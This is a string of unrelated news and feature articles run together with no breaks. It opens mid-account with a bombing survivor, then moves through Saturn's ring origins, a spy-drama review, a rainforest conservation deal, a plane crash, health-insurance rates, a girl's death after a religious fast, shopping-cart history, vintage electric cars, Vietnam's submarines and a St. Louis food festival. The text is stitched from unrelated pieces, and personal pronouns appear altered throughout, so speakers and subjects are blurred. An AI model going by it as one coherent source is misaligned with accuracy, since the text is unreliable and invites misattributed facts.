At some point a soldier came and carried me into the makolet. Only then did I start hearing the screams and notice the cameras in my face. Liana's twin brother showed up at the scene, desperate to find their sister: “Where's Liana? Where's Liana?” All I could do was point in the direction of the bodies. Much later, I found out that my family knew I had been in the blast only because they saw me on TV, lying on the sidewalk and reaching for help.
How Saturn got its rings has long been a mystery, but a paper published in Nature this week put forward a new idea about where all that watery material originated. Dr. Robin M. Canup suggests that Saturn's rings could have originally been the icy outer layers of large satellite moons that were stripped away by Saturn's tidal forces as the moon spiraled into the planet itself.
There have been many theories about where Saturn's rings came from. One involves the disruption of a small moon, though that doesn't account for the fact that the rings are made almost entirely of ice. Another popular theory is that many comets, which are made of ice, got too close to Saturn. In the new paper, Canup points out that having enough comets run into Saturn to deliver the entire volume of the rings is unlikely.
Instead, Canup proposes that the ice originated from much larger bodies. They suggest that ice-encased satellites about the size of Saturn's largest moon Titan drifted too close to the planet, allowing the ice to be torn away by the forces at the Roche limit.
The Roche limit is a feature of every celestial body. It's a kind of destruction boundary that lies at a distance from the body's surface that's set by its gravitational pull. When a smaller object crosses the boundary, the tidal forces of the large body overcome the gravity holding it together, and the small object gets torn apart.
Using smooth particle dynamics, Canup modeled a large moon with an outer icy layer reaching Saturn's Roche limit. They found that, for a particular ratio of external ice to internal metal or rock, the icy layers of the moon could by stripped away once it's inside the Roche limit. Before the tidal effects could disrupt the rocky insides of the moon, though, it would crash into Saturn, leaving its ice behind in orbit.
The model would explain a number of phenomena other than the rings' origin. Canup's analysis showed that, as time passed, interparticle collisions within the rings would allow them to spread and decrease in mass while maintaining their ring shape. Contrary to other popular theories, this would indicate that the rings started out larger and denser than they currently are, and have lost volume over time.
As more time elapsed in the simulation, Canup found that the outer ring particles could conceivably accrete into whole icy moons. This would explain the origin of many of Saturn's interior moons, including Tethys, which, like the rings, are around 90 percent ice. (This isn't the first model to suggest this.)
Of course, if Canup is going to claim that icy comets flying in to populate Saturn's rings is unlikely, large moons that have just the right ice-to-rock ratio don't sound much more probable. But the ratio may not have had to be just so—the rings do currently have some rocky debris in them, which could be remnants of any interior moons that went in for a crash landing.
In fact, the origin of the non-ice material in the rings could turn out to be a better key to understanding their origin than the ice itself. The debris is often said to be meteoroid pollution, but Canup notes that, if a ring that started out several orders of magnitude more massive, it would have had enough mass and angular momentum that it shouldn't have picked up much pollution. The icy interior satellite moons should have prevented this as well.
NASA's Cassini spacecraft will help settle this matter by taking data on Saturn's rings, including the impact rate of their particles, and a direct measurement of the rings' total mass. Canup notes that the data will help determine how susceptible the rings are to pollution, and may indicate the history of their size.
Nature, 2010. DOI: 10.1038/nature09661 (About DOIs).
Listing image by NASA
Some background, my family and I emigrated to the US right before the fall of the Soviet Union and I was old enough to remember the news coverage yet not old enough to really grasp the way of life before the move. I heard stories though, lots and lots of stories (from very disenfranchised family members). And so I grew up in the US all throughout the 90s gobbling up and loving the pop culture of the 80s and so on. At the time, all villians in everything were Russians, and while it made my parents grown, I loved it. But I must say this is the very first piece of pop culture to portray the Soviets as a worthy adversary, and not only that, it actually sets the story from their perspective.
There are no blatant good or bad guys, just shades of grey in a world where the two biggest kids on the block are too proud to work together and may just annihilate the whole neighborhood if one pushes the other too far.
The scope of the setting is amazing, early 80s... the cars, the hair, the clothes and the quaint spy gear. The show is realistic so you won't be seeing any James Bond style shenanigans but that doesnt make it any less mesmerizing. Any spy fan will love this drama.
As for the show format, it is a somewhat outdated story telling method where not every episode ends in a cliffhanger and the episodes are not just 1/10 of a story written to span 10 hours. There is some of that, definitely but this more reminds me of the X-files years after the show hit it stride where you still had self contained episodes but an overarching plot began to develop in the background. Thats how this show works. Each episode (at least in the first season) has it's own little crisis which the spies battle against and overcome all while building towards a larger narrative. The show starts really slow for those who are used to the way HBO or AMC does things, it took me 6 episodes to get my girlfriend interested (through much pain and suffering I got them into it). However once things start rolling, they don't stop and the stakes get higher and higher.
To all history buffs out there, there are lots of real events which impact the show, as they rightfully would have back in the day... ie the assassination attempt on Ronald Reagan left the Soviets paranoid they'd be blamed and urged them to mobilize a first strike team just in case. If you're a fan of period dramas, this show is a gold mine of "the way things were" and really reminds me of the first season of Narcos.
I can't recommend this show highly enough, if you're not getting hooked immediately, do yourself a favor and try to watch (and I do mean WATCH, this is a pay-attention type of show) the first season, guaranteed you'll be hooked before it ends.
British Columbia on Monday will announce "one of the most visionary forest conservation plans on Earth" to protect a massive chunk of coastal rainforest—a deal that has the approval of First Nations groups, environmentalists, and loggers alike and is more than a decade in the making.
The agreement will protect 85 percent of the region's Great Bear rainforest, with the other 15 percent open to logging under the "most stringent" standards in North America, according to environmental groups who were involved in the negotiations.
It is "one of the most visionary forest conservation plans on Earth," said Valerie Langer, solutions director at ForestEthics, one of the groups that signed on to the deal. "It is a principled approach that sets a new legal and science-based standard for sustaining healthy forests and maintains intact, old-growth that will keep millions of tonnes of carbon out of the atmosphere."
The Great Bear rainforest is home to 26 First Nations tribes, as well as a variety of animal species and ecosystems. The deal strengthens First Nations oversight of their land and will end the commercial grizzly bear hunt in the region.
"Under this landmark agreement, more old and second growth forest will be protected, while still ensuring opportunities for economic development and jobs for local First Nations," said BC Premier Christy Clark in a statement.
The deal is being widely championed as a model for future conservation efforts because negotiators were able to bridge the gap between regional economic needs, the sovereignty of First Nations, and the concerns of environmentalists. Reuters reports:
SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts
In the 1990s, frustrated over what they saw as destructive forestry practices on their traditional lands, First Nations partnered with environmentalists to fight back against logging companies, blockading roads and protesting. By the early 2000s, environmental groups and industry players, including Interfor Corp, Western Forest Products Inc and Catalyst Paper Corp, had started talks. At the same time, government began negotiating with the Coastal First Nations and Nanwakolas Council. The final agreements, reached more than a decade later, will "help mitigate climate change, support improved community well-being, and provide economic certainty to the forestry sector," environmental groups that engaged in the process said.
"Today is the culmination of 20 years of campaigning for the Great Bear Rainforest," said Richard Brooks, forest campaign coordinator at Greenpeace. "The completion of this marathon would not have been possible without the incredible leadership of the rainforest's First Nations leaders. From conflict to collaboration, we now celebrate the protection of areas of cultural and ecological importance while ensuring economic opportunities for the communities exist long into the future."
"This is a gift to the world," Brooks told CBC News. "It should give hope to other areas that are currently in conflict, that those conflicts can move towards collaboration and eventually to conservation and economic prosperity and well-being for communities."
A view from the sky at the Jacqueline Cochran Airport in Thermal
A view from the sky at the Jacqueline Cochran Airport in Thermal
THERMAL, Calif. - California's Civil Air Patrol confirms it found a missing Cessna in the "Borrego Badlands", after it departed the Thermal airport Friday morning.
According to incident commander, Capt. Shane Terpstra, the aircraft took off from Jacqueline Cochran Regional Airport on Friday morning and did not return from a round-trip flight to the Borrego Springs area in northeast San Diego County.
Saturday morning, officials say one of the Civil Air Patrol aircraft located the missing airplane in a remote area of the Anza Borrego State Park. The missing airplane appeared to have crashed and was lying upside down. The area it was located in is commonly referred to as the "Borrego Badlands" and is very desolate.
The Civil Air Patrol aircraft guided the ground search crew into the area of the crash via radio. One member of the ground search crew located a dead man near the wreckage. Deputies from the Sheriff's Rural Division and the Sheriff's Search and Rescue were able to drive to within approximately one half mile of the crash site. They hiked into the area to secure the site and later escorted personnel from the San Diego County Medical Examiner's Office into the area to conduct their investigation.
The Medical Examiner's Office will determine the cause of death and notify the next of kin.
The F.A.A. and N.T.S.B. were notified and they will be responding to the crash site Sunday to conduct their investigation.
The aircraft involved is a single-engine Cessna 162 Skycatcher. The aircraft is configured with two seats, though only the pilot was believed to be on board.
Public information officer Maj. Crystal Housman says this is the second aircraft search that Civil Air Patrol's California Wing has been involved in this week. On Tuesday morning, a CAP aircrew located a crashed Piper PA 28 and is credited with saving the pilot, who was stranded overnight in a southern area of the Sierra Nevada mountain range.
Summer is upon us. For most Americans, this means bathing suits and beaches. For America's health wonks, hot weather signals something completely different: it's the start of health insurance rate filing season.
Health insurance plans are just now starting to turn in the prices they want to set for coverage next year. These filings are the first glimpse at how expensive Obamacare will be in 2015.
They're not easy to read, either: insurance rate filings tend to be dozens of pages long, filled with charts and jargon. No individual filing tells the entire story of how much premiums will increase in 2015. But there are a few things worth keeping in mind about what, taken altogether, the coming deluge of premium rates can tell us about the price of health insurance.
1. Insurance premiums went up every year before Obamacare. They're likely to go up afterwards, too.
Every year since the government began tracking these sorts of things, the cost of medical care has increased. Some years it increases slowly; some years it increases faster. But its a pretty constant truth that the grand total of health care spending always goes up.
This means that premiums, which insurance companies use to cover subscribers' medical bills, is near certain to increase — just as they would have if the Affordable Care Act had never become law.
"You've got things related to medical cost growth that have nothing to do with the health care law," says Caroline Pearson, vice president at research company Avalere Health. "Independent of any other factors, insurers may have a 5 to 6 percent increase in medical trend they need to account for."
2. Some rates will go up a little. Some will go up a lot. A handful might go down.
"There's a lot of variability by state and by plan," Pearson continues. "Some plans overpriced and some underpriced. Just because a single-carrier is increasing or decreasing a rate doesn't tell you a lot, except that they may have missed the boat last year."
The recently-released rates from Washington are a good example. There, the proposed rate changes range from a 6.8 percent decrease to a 14.2 percent increase.
Molina, the company with the 6.8 percent decrease, had set its premiums much higher than its competitors. Of course, the health plan didn't know it was setting prices higher when it did so — since 2014 was the first year of the exchanges, nobody knew what other insurers would be charging.
'a single carrier increasing or decreasing rates doesn't tell you a lot'
What Pearson expects to see this year is similar behavior elsewhere, with health plans that set premiums much higher or lower than the average regressing to the mean and trying to get a bit closer to their competitors' prices.
"I think the average premium will only move a bit," they say. "But where you'll see more movement is in the band of prices shrinking, and premiums getting closer."
3. Every state will be different
There's huge variation in what percent of the eligible market each state exchange reached. States that have reached a higher proportion of those who could shop on the marketplace are likely to have healthier populations. More people, the thinking goes, means the exchange netted not just the really sick people who need insurance but also some people who won't use their health insurance plans as much.
what happens in massachusetts could be way different than alabama
States have made different policy decisions that could also effect insurance rates. Some, for example, have allowed plans that don't comply with Obamacare to stay in the individual market. This could keep some healthier people out of the exchange, and insurers might need to change their rates to reflect that change.
"The people who were less healthy would be more likely to gravitate towards the compliant-coverage because its more robust," says Cori Ucello, senior health fellow at the American Academy of Actuaries. "Plans knew ahead of time, when setting their rates, which states were allowing these transitional policies, so they could build that into their prices."
Last, even before Obamacare, there was huge variation among states — and some of the factors driving that are still in play.
Massachusetts tends to have higher prices because many academic hospitals in Boston are able to command really high prices. Alabama providers earn less, and premiums are cheaper there.
4. What matters the most: who insurers expected to sign up in 2014
There's a lot of chatter in health policy circles about exchange sign-ups falling short of the Obama administration's target for young adults. The White House has previously said it hoped for about 39 percent of sign-ups to be between 18 and 35, but the number only ended up at 28 percent.
What matters more than what the White House wanted is what insurance companies expected. If insurers have been less optimistic this whole time — and expected young adults to be less than a third of enrollment — than they wouldn't need to jack up premiums to account for their mistake. But if their estimates were off — they expected more or less young adults — than they might change their rates to reflect the difference.
"Even if a plan has a high average age, if the insurer expected that, it doesn't mean there will be a big increase in the rates," says Cori Ucello, a senior fellow at the American Academy of Actuaries.
5. The rates for 2015 involve a lot of guesswork
Insurers don't fully know who signed up for their health insurance plans. Yes they know their subscribers' names, where they live and how old they are. But they don't quite know yet who has expensive health conditions — or who might not use a single doctor visit in the entire next year.
'we still don't have a very good idea of who is enrolled'
That's because the open enrollment period just ended in mid-April. The people who signed up for coverage in April didn't even start their plans until May 1, less than two weeks ago.
"We still don't have a very good idea of who is enrolled," says Elaine Corrough, a fellow at the Society of Actuaries who consults with health plans on setting premiums. "Insurers are able to take into account maybe two or three months of experience."
Insurers do know how old their new enrollees are, which can they can use as a bit of proxy for how healthy people are. But age isn't a perfect predictor: It's possible to have a 29-year-old with really high costs, or a 50-year-old who barely spends a dime. Right now, insurers don't know which patients will be really expensive. They just haven't had enough time to figure it out.
6. These are only opening bids
What insurers are turning in right now are their proposed rate increases. These are an opening volley in negotiations between health plans and regulators that will happen over the next few months.
Over the course of those negotiations, prices can change dramatically. In Iowa, for example, Pearson notes that the average proposed increase started at 17 percent. But the average increase allowed was only 7 percent.
"They know they're going to get push back," says Pearson. "In some states, the rates come down a lot between the initial and final proposed increase."
Mouli Mareedu By
Express News Service
HYDERABAD: Notwithstanding the widespread criticism of parents of 13-year-old Aradhana, who died after fasting for 68 days, the Twin Cities Jains' Association on Monday gave them a clean chit. The community elders also issued an advisory to the members of the faith to provide medical aid to women or girls, who observe such a long fast.
Against this backdrop, the Hyderabad city police have decided to take legal opinion, before proceeding further against Aradhana's parents.
Earlier in the day, the Twin Cities Jains' Association members held a meeting at Shree Jain Sevak Sangh Hall at Edenbagh in Ramkoti and discussed the issue.
The meeting was organised exactly a day after the police registered a case of culpable homicide against Aradhana's parents. Association president Ashok Jain told Express that they support the family members of Aradhana. “It was an unfortunate incident. The girl is no more. Aradhana was attracted towards religious practices and they sat on a long fast as per them wish. How can we find fault with their parents?” Ashok asked.
Mangilal Bhandari, Chairman of Fight for Right, who attended the meeting, said some NGOs were deliberately casting aspersions on the community. “We will take the issue seriously and fight to protect our culture and traditions,” they said. Further, Jain said every woman follows such rituals in their community.
The association will also meet the community Guru Pujye Upadhay Prav Shri Ravindra Muniji Maras at Kachiguda and discuss the issue, they added. “The Guru is likely to interact with the media on Tuesday in Hyderabad to explain the benefits of fasting, which are being criticised in Hyderabad, as the people of the State are unaware of this religious practices,” sources said.
Aradhana breathed their last a few days ago after observing a 68-day fast as part of their community rituals. The girl was rushed to a corporate hospital where they were declared brought dead. They died due to cardiac arrest.
They're everywhere - in almost every grocery store, department store, and bulk item superstore. Depending on where you live in the world, you might call them carts, trolleys, carriages, buggies, or wagons. The guys from MTV's Jackass practically built their careers on them. Yet most of us have never really considered just where the ubiquitous shopping cart came from. Come along as we take a trip through the fascinating history – and possible future – of the common grocery cart.
Let's Get Rolling
Sylvan Goldman had a problem. As was customary for grocery stores in 1936, their Standard/Piggly Wiggly locations in Oklahoma City supplied shoppers with a small wooden or wire basket for them to carry as they wandered up and down the aisles. Once the basket got too heavy, though, customers headed for the check-out line, a situation Goldman wanted to avoid. To keep them buying, Goldman was determined to figure out a way to make heavy baskets more manageable.
One night, they happened to look at a wooden folding chair and inspiration struck.
They placed one shopping basket on the seat and another under the chair, then envisioned wheels on the legs, and a handle on the back. They were on to something. It took a few months of tinkering, but Goldman eventually settled on a design that was convenient and flexible. To use a cart, you took a folded-up frame from a row of them stacked side-by-side. In their folded form, they were only about 5” wide, so storage space was minimal — a factor Goldman knew would come into play for their invention to be accepted in other stores. Once unfolded, the shopper would grab two baskets and place them in two holders on the frame - one above and one below. When they were done shopping, the check-out girl simply put both baskets on the counter and rang everything up.
Unfortunately, the big debut of their big invention was a great big flop. Despite having a pretty young woman at the entrance to help customers set up the carts, the only people interested in using them were the elderly. Men were too proud to admit they needed help carrying a basket, and some younger women said they had pushed enough baby buggies that they weren't going to use one for shopping, too. Distraught, Goldman hatched another plan – they hired attractive men and women to push carts around inside the store and pretend to shop. When real customers came through the doors and refused the cart, the young woman at the entrance looked back into the store and said, “Why? Everyone else is using them.” Never underestimate the power of peer pressure.
By 1940, only three years after they were introduced, carts had become so popular, entire grocery stores were being designed around them with wider aisles and larger check-out counters to hold all the food people were buying.
Ch-ch-ch-changes
Goldman's cart was a great jumping off point for more inventors to have a go at their own shopping cart designs. The first big innovator was Orla Watson, who, in 1947, made the baskets permanently attached to the cart, and redesigned them to have a hinged back, allowing each basket to nest inside another one like spoons for easy storage. The carts were a hit with shoppers, but a pain in the back for check-out girls who had to bend over and dig food out of the bottom basket for hours on end. So Watson made the top basket fold up and out of the way, while a hydraulic platform at the check-out counter would lift the bottom basket up to counter height at the push of a button.
The shopping cart we all know - with one big basket – was first introduced in the 1950s. Aside from a few tweaks here and there, like the baby seat, drink holders, the plastic handle, even bigger baskets, and upgraded wheels, the shopping cart's basic design hasn't changed much since then. But that doesn't mean that shopping cart technology has grown stagnant. Great minds out there are working on new ideas to take the shopping cart into the future.
One company, Springboard/Mercatus, has developed the Concierge system - a small LCD touchscreen attached to the handle that can make your shopping trip just a little bit easier. The screen not only shows you a map of the store, including where items are located in each aisle, but will also track where you are within the store to tell you what items are on sale in the aisle you're currently walking down. If you have a membership card for a store, you could swipe your card on the cart and it will tell you what items you've purchased before that are on sale this week. While you do your shopping, you can scan the barcodes of items as you place them in the cart and they'll automatically be added to your card number (and removed from the store's inventory). When you're finished, you simply hand the check-out person your membership card, they swipe it, and you swipe your debit card to pay for everything in your cart.
As the size of big-box stores approaches 250,000 square feet, many designers are looking for better ways for shoppers to get around. One possible idea is the UNIT shopping cart by Liubov Kurzanova. The cart features a retractable platform for the shopper to stand on while they use the steering wheel to scoot around the store on a rechargeable electric motor. The control panel also features an LCD screen to, among other things, help shoppers find items within the store. But the really big innovation of the UNIT is the barrel-shaped body with a flexible nylon net inside. When a shopper adds items to the net, it starts to droop further into the barrel. Once they get to the check-out and start removing items, the net starts to retract and come closer to the cart's opening, meaning the shopper never has to bend over to retrieve their purchases.
Fetch, Cart, Fetch!
How does a blind person shop at the grocery store? A canine assistant can't tell where the salsa is on the shelf, and most stores don't have braille on every price tag. It's one of the few things a blind person can't do for themselves nowadays. But soon, even this impossible task could be accomplished thanks to the RobotCart produced by Vladimir Kulyukin and students at Utah State University. On the cart's handle is a braille listing of all of the items in the store, each with its own code number. The shopper can punch in the number of the product on a keypad and, thanks to Radio Frequency ID (RFID) tags hanging on the shelves, the robot will automatically start rolling towards the item in the store, giving voice instructions along the way to help the shopper follow along. To avoid obstacles – like a new store display or another shopper – the cart uses laser range finders to help it “see” the path ahead and adjust its route accordingly.
Stop, Thief!
Carts generally cost between $100 - $150 each, so losing them to thieves is not something a store can ignore. Almost every major city has one or more companies whose sole business is to retrieve and return abandoned carts to their rightful owners for a small fee. But many stores have taken steps to keep carts from disappearing in the first place with the installation of a system by Carttronics, a company out of San Diego. Their Cart Anti-theft Protection System (CAPS) is a plastic cap that slams down over one of the front wheels whenever a cart crosses over a magnetic barrier in the parking lot, essentially stopping it cold. An employee can unlock the wheel remotely or with a special electronic key.
The Dangers of Shopping
Shopping carts are pretty dangerous. The American Academy of Pediatrics (AAP) reported that 20,700 kids under 5 years old were treated in hospital emergency rooms for shopping cart-related accidents in 2005. About 75% of these injuries were to the head or neck with about 85% occurring after a kid fell out of the cart or caused the cart to tip over. Current restraint systems are inadequate for proper protection once a kid gets too old, so the AAP recommends putting your kids in carts that look like race cars or fire trucks. They're less likely to fall out and if they do, they don't have very far to go. Their best advice to help avoid shopping cart accidents – leave your kids with a caretaker while you go to the store by yourself.
Shopping carts are also pretty gross. A 2007 study by the University of Arizona found that human saliva, mucus, urine, fecal matter, as well as the blood and juices from raw meat, were found on the handles and child seats of 36 grocery carts in San Francisco, Chicago, Tucson, and Tampa. The carts ranked third on the list of the nastiest public items to touch, with only playground equipment and the armrests on public transportation producing more germ-laden results.
Because of this, many states have asked stores to provide sanitary wipes for customers, or to provide regular sanitation measures. Some of these measures include the PureCart cleaning system, which operates like a miniature car wash to spray carts with FDA- and EPA-approved chemicals that eliminate 99% of the nasties found on a typical shopping cart. A similar system, the Germ Terminator, created by Fleet Cleaning Systems, uses harmless UV-C ultraviolet light to destroy 99.9% of bacteria without chemicals. Both are incredibly economical – the PureCart costs about 1 cent per cart and the Germ Terminator is only about $3 per month to operate – which is generally cheaper and more effective than a container of wet wipes at the door.
The automotive industry is currently going through its biggest evolution since the dawn on the motorcar in the late 19th century. I am of course talking about the rise of the electric car. With concerns growing over the environment and the use of fossil fuels, the car industry has realised that the future (for now), apparently lies with the electric car. Pretty much every major manufacturer is rushing to sell their own electric vehicle, attempting to gain a slice of a new and emerging market. So the public could be forgiven for thinking that the early part of the 21st century witnessed the birth of the electric car. And that doesn't even take into account the infamous General Motors EV1 (launched in 1996) which impressed on its debut. But it was then cancelled under very controversial circumstances. It may therefore come as a bit of a surprise to many that the concept of an electric car is not at all new. And there are even vintage electric cars!
So it may come as a bit of a surprise to some but the vintage electric car was actually there at the emergence of the automobile industry. It is a fact that raises many questions, most prominent of which is “why did they not succeed?”
When I got the invitation from Historics at Brooklands Auctioneers to film two very rare vintage electric cars, I was not really sure what to expect. I'd never come across one before. Though I have seen plenty of vintage cars from the period and even filmed a few (see our review of the Regent Street Motor Show 2014 and 2015, our London to Brighton Veteran Car Run film and our Citroen 5CV film). Needless to say I was excited about getting the chance to drive both of these fascinating vehicles. And both of the vintage electric cars turned out to be surprisingly good cars to drive.
1907 Victor High Wheel Runabout
First up was the 1907 Victor High Wheel Runabout. On first impressions it looked just like any other horse drawn carriage that we've all seen in TV westerns. It had large wooden spoke wheels, the bench seat was very high up. There was even a large brake lever on the side, like the ones in the wild west movies.
The Victor High Wheel Runabout is quite unique in that it is the only known example ever built. The car was mentioned in the Standard Catalogue of American Cars 1805-1942 as being registered to a S.H. Bunshaw of Lincoln, Nebraska. However no further documentation has been found. So its history is unknown. It is believed to have been a prototype, which goes some way to explain why a traditional carriage was used as the test platform for the electric motor and drive train.
The Victor is powered by a DC motor which originally would have been powered by period lead acid batteries. Owner Bryan has upgraded the system to six Odyssey PC2250 high capacity traction batteries (all charged through a Vivian high capacity charging system). These provide a combined 70 volts and give the Victor a range of 65-75 miles on one full charge. Which isn't bad for a vehicle from 1907.
What surprised me the most about the Victor, apart from the relative silence as we drove along, was how quick it was. Even with the weight of the carriage, the batteries and myself and Bryan as occupants, it had a surprising amount of power. This meant the car could attack hills at speed and could maintain its climb at an impressive rate. And even more surprising was the fact that on the down hill, the cars motor recovered some energy, effectively charging the batteries every time it descended. Bryan reckoned this only amounted to a few amps. But over a long, hilly journey, it certainly would help replenish the batteries a little. Who would have thought an energy recovery system would have existed on a car in 1907? Incredible!
The Victor continued to impress on the technology front with its differential, which helped take care of traction on the go. And while the suspension was a little firm, using just two elliptical springs, the designers did add torsion bars on the sides to aid the drive and gearing system. Clearly a lot of thought went into the design of the vehicle, despite its old fashioned appearance.
Another clever feature was the centre mounted tiller steering bar which allowed the driver to swap the controls to the passenger. So the car could be left hand drive or right hand drive, depending on the drivers mood or country of operation. The steering did take some getting used too, but it was pretty easy to control once I got used to it. The large wheels did require a bit of effort to turn up front and due to the size of the Victor, its turning circle wasn't brilliant. But the motors controls and excellent braking meant it was very easy to manage, making the whole car very easy to drive indeed. Even though it was a vintage electric car, it was an impressive vehicle with interesting, modern touches.
1906 Pope Waverley Victoria Phaeton
Next up was the 1906 Pope Waverley Victoria Phaeton. Again this vintage electric car had a very traditional appearance and could easily have been mistaken for a horse drawn carriage. Though its small wheels and more compact appearance would have hinted at its automobile identity.
Like the Victor, the Waverley is fitted an DC motor with power supplied by the same six batteries as installed in the Victor, giving it a range of roughly 50 miles. The Waverley however doesn't have the ability to recover energy on the down hill, perhaps reflecting the advancement in technology between it and the Victor. However its main advantages over the Victor were its compact size, retractable hood, front weather proofing for the occupants and electric lights. The Victor didn't have any electric lights at all which meant it couldn't be driven at night. The Waverley wins then on the practicality front.
The Waverley drove very similar to the Victor except its tiller steering was fixed to the left side of the car, making it a let hand drive car. This meant you controlled the tiller lever with your right hand, and worked the speed regulator lever with your left. Like the Victor it had a forward and reverse gear with the addition of neutral in the middle. Unlike the Victor, it's braking system couldn't be controlled by pulling back on the regulator. Instead two brake pedals helped slow the car down. These required a good shove to operate, especially when going down hill, but they did work.
Despite its lack of power on the hills, the Waverley performed very well on the flat and felt very swift indeed. The steering was easier to operate thanks to the smaller wheels and the turning circle was superb. And thanks to its compact size and slightly slower top speed, it felt more controllable. The lower seating position certainly helped there. It was also very comfortable as we were essentially sitting on a very fancy sofa attached to four wheels and an electric motor. It was brilliant fun.
What struck me the most after spending the day with these very rare vintage electric cars, was how easy they were to drive. I had assumed because they were old vintage cars, that they might be a lot more difficult to handle. But I couldn't have been more wrong. The Victor and the Waverley are probably the easiest vehicles I have driven (and the oldest as well). And given the difficult reputation petrol cars earned form the same period (the Model T Ford was very hard to drive for example), it does make you wonder why these electric cars didn't catch on. Mechanically both vehicles are very simple, requiring very little maintenance. There's no clutch to have to learn how to use, or no gearbox to fight with. And there's no wrist breaking crank handle to dice with either. Also the fact that both these vehicles could be trickled charged at home using a domestic power supply in the 1900s, draws fascinating parallels with contemporary plug in electric cars. It has almost come full circle.
So why didn't cars like the Victor or the Waverley catch on at the turn of the 20th century? Perhaps it was easy access to cheap fuel that lead to the rise of the petroleum based car, coupled with the resulting rising power of the petroleum companies. Another thing to consider is access to electricity. It was not widespread in turn of the 20th century America. Only those well off enough could afford to have it, immediately limiting demand for electric cars with the wider population. It really is a great shame they didn't take off, especially given their ease of use… anybody could have driven one.
Whatever the reason, the electric car eventually vanished and the same fate also befell the steam car (see our film with Bryan's Stanley Model K steamer here). Leaving petrol the winner and it has dominated ever since. But as we all know that domination is starting to wain. We are now living in the era of the rebirth of the electric motorcar. It is therefore fascinating knowing that legacy of the Victor and the Waverley lives on, making both these cars a very interesting piece of early motoring history. They really are the forgotten vintage electric cars.
Historics at Brooklands Auction 11th June 2016
Both the Victor and the Waverley are coming up for sale at Historics auction at Brooklands on Sunday 11th June. Both vehicles carry an estimate of £30,000 – £40,000. This presents a seldom repeated opportunity to acquire two exceptionally rare vintage electric cars.
More details on the Victor can be found here on Historics website.
And more details on the Waverley can be found here on Historics website.
As concern has increased about China's aggressive claims to almost all of the disputed water, Vietnam has been spending billions of dollars developing a submarine fleet, shore-based artillery and missile systems, multirole jet fighters and fast-attack ships, most of which have being bought from Russia and India. A submarine can be seen in the middle pier at Cam Ranh Bay in Vietnam. Credit:Google Maps Vietnam was also seeking more Russian jet-fighter bombers and was in talks with European and US arms manufacturers to buy fighter and maritime patrol planes and unarmed surveillance drones, Reuters said, quoting unnamed sources. The country has also recently upgraded and expanded air defences, including obtaining early-warning surveillance radar from Israel and advanced S-300 surface-to-air missile batteries from Russia. Vietnam's military spending had outstripped its south-east Asian neighbours over the past decade, the Stockholm International Peace Research Institute said.
Carlyle Thayer, a professor from Australia's Defence Force Academy in Canberra, said when all six of Vietnam's submarines were operational they would provide a potent strike capability with Vietnam's anti-ship and land attack cruise missiles, adding greatly to the country's ability to confront an enemy in its waters. Cam Ranh Bay has been described as Vietnam's "ace up its sleeve" against China's vastly larger and better-equipped navy, air force and army. Credit:Google Maps "These weapons systems should enable Vietnam to make it extremely costly for China to conduct maritime operations within a 200 to 300-nautical-mile band of water along Vietnam's coast, from the Vietnam-China border in the north-east to around Da Nang in central Vietnam, if not further south," Professor Thayer said in a Thayer Consultancy background briefing paper. Professor Thayer, an expert on Vietnam's military and the South China Sea dispute, said Vietnam's ability to deploy stealthily would be put at risk if China permanently stationed anti-submarine warfare aircraft on Fiery Cross Reef in the Spratly Islands, where China has built a 3000-metre airstrip and some basic infrastructure. China landed a civilian plane on the strip on January 2, sparking a furious response from Vietnam, which labelled it a "serious infringement of the sovereignty of Vietnam".
Analysts said it was difficult to gauge Vietnam's actual capabilities and how well they were integrating complex new weapons systems. But Professor Thayer said when all of Vietnam's current and future arms acquisitions were taken into account, "it is evident that Vietnam has taken major steps to develop a robust capacity to resist maritime intervention by a hostile power". The diesel-electric submarines, also known as Varshavyanka-class, are designed for anti-submarine warfare, anti-shipping and anti-surface ship warfare, patrol and reconnaissance, and for the defence of naval bases and coastlines. They are considered one of the quietest submarines, can operate in the South China's Sea's shallow water and have been upgraded constantly since the 1980s. Analysts say they are more technologically advanced than other Russian-made submarines in China's fleet.
Analysts said Cam Ranh Bay was Vietnam's "ace up its sleeve" against China's vastly larger and better-equipped navy, air force and army, against which it fought a bloody war in 1979. Vietnam has signalled it will invite non-Chinese navies such as Russia, the United States and Japan to send ships and submarines to the harbour for maintenance and logistics support. The harbour, which was the US's centre of naval operations during the Vietnam War, provides ships easy access to the disputed water and the Indian Ocean through the Strait of Malacca. The International Crisis Group has warned that the South China Sea risks becoming a theatre of big-power competition in 2016, as the US challenges China's large-scale land reclamation and construction on disputed reefs, which has set Beijing on a collision course with several south-east Asian nations. A tribunal in The Hague is expected to announce its verdict in a landmark case filed by the Philippines accusing China of violating international law in the South China Sea, further raising tensions.
Malaysia, Brunei, Taiwan, Vietnam, the Philippines and China have overlapping claims to the territory. More than $US5 trillion ($7 trillion) of trade passes every year through the South China Sea, which is also believed to hold huge deposits of oil and gas. - with Reuters Follow FairfaxForeign on Twitter Follow FairfaxForeign on Facebook
Taste of St. Louis begins today and closes Sunday. This year, the festival announced a change in location from downtown St. Louis to Chesterfield. The event's relocation has been a hot-button issue for some St. Louis residents. Former school teacher and lifelong Ferguson resident Jerry Benner, 70, believes the change redefined the event.
“It's not taste St. Louis. It's taste of Chesterfield,” Benner said.
Benner's position exemplifies a negative reaction to the new location. But event organizer Mike Kociela sees more positives. They stressed the weekend's highlights: fireworks, 43 participating restaurants, performances by bands Big Head Todd and the Monsters and The Urge, and demonstrations by Food Network celebrities Tyler Florence and Duff Goldman. Kociela believes the event's success will continue in the tradition of the previous nine years.
“The Taste is its own brand and its own business structure, so it's really just moving that whole operation to a different part of town. And it's been seamless, to be honest,” Kociela said.
But Benner worries the relocation removes the festival's potential as a unifying event for St. Louis.
“The city of St. Louis is the hub. That's where something like this belongs. It's pulls people from north, south, east and west, rather than just from West County,” said Benner.
For them the downtown location was a chance to bridge the gap between the area's different cultures, black, white, Hispanic, Asian. “You're all kind of mixed together, and I think that's a very healthy way to integrate things,” said Benner.
Benner says events such as Taste are a chance to “desegregate” different St. Louis communities that can often be insular. Benner said they had no plans to attend the festival in Chesterfield, but would go if many of their friends asked them to go. Still, they believe the location undercuts the potential to bring people together.
Kociela was wrangling golf carts during set-up this week, when they spoke with St. Louis Public Radio. They said the decision to move the festival was financially motivated.
“It's a business decision we have to make on how to run this event,” they said. They felt it would monetarily benefit the event to relocate it to Chesterfield. “It's a very high risk event as far as finances go; and all things considered, we're just moving forward and just getting past that whole deal, and we're excited to be in our new location.”
